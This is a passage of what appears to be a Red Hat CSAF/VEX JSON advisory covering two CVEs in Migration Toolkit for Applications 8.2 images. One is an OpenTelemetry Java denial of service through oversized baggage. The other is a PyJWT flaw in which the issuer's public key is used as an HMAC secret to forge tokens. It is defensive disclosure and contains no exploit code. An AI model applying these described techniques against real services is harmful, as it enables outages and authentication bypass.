"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482785"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenTelemetry Java, specifically within the baggage propagation implementation of opentelemetry-api and opentelemetry-extension-trace-propagators. A remote attacker can exploit this vulnerability by sending oversized baggage, which leads to unbounded memory allocation and high CPU consumption. This can result in a Denial of Service (DoS) for the affected service. Furthermore, because baggage is automatically re-injected into outgoing requests, the impact can spread to other downstream services.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "opentelemetry-java: opentelemetry-api: opentelemetry-extension-trace-propagators: OpenTelemetry Java: Denial of Service due to unbounded memory allocation when parsing oversized baggage",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in OpenTelemetry Java\u0027s baggage propagation, affecting Red Hat products that use OpenTelemetry for telemetry. A remote attacker can exploit this by sending excessively large baggage, leading to uncontrolled memory and CPU usage. The vulnerability\u0027s impact can extend to downstream services due to automatic re-injection of baggage into outgoing requests.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-45292"
},
{
"category": "external",
"summary": "RHBZ#2482785",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482785"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-45292",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45292"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-45292",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45292"
},
{
"category": "external",
"summary": "https://github.com/open-telemetry/opentelemetry-java/commit/03837d3c1763bc35464aea1078671e2ef2336a5f",
"url": "https://github.com/open-telemetry/opentelemetry-java/commit/03837d3c1763bc35464aea1078671e2ef2336a5f"
},
{
"category": "external",
"summary": "https://github.com/open-telemetry/opentelemetry-java/pull/8380",
"url": "https://github.com/open-telemetry/opentelemetry-java/pull/8380"
},
{
"category": "external",
"summary": "https://github.com/open-telemetry/opentelemetry-java/releases/tag/v1.62.0",
"url": "https://github.com/open-telemetry/opentelemetry-java/releases/tag/v1.62.0"
},
{
"category": "external",
"summary": "https://github.com/open-telemetry/opentelemetry-java/security/advisories/GHSA-rcgg-9c38-7xpx",
"url": "https://github.com/open-telemetry/opentelemetry-java/security/advisories/GHSA-rcgg-9c38-7xpx"
}
],
"release_date": "2026-05-28T16:37:29.490000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "opentelemetry-java: opentelemetry-api: opentelemetry-extension-trace-propagators: OpenTelemetry Java: Denial of Service due to unbounded memory allocation when parsing oversized baggage"
},
{
"cve": "CVE-2026-48526",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-05-28T16:01:22.805235+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482734"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer\u0027s public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in PyJWT allows for authentication bypass and unauthorized access. It occurs when a JWT verifier is misconfigured to accept both symmetric and asymmetric algorithms, and a public JSON Web Key is erroneously used as the HMAC secret. Red Hat products are only affected if they utilize this specific, non-standard verifier configuration.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
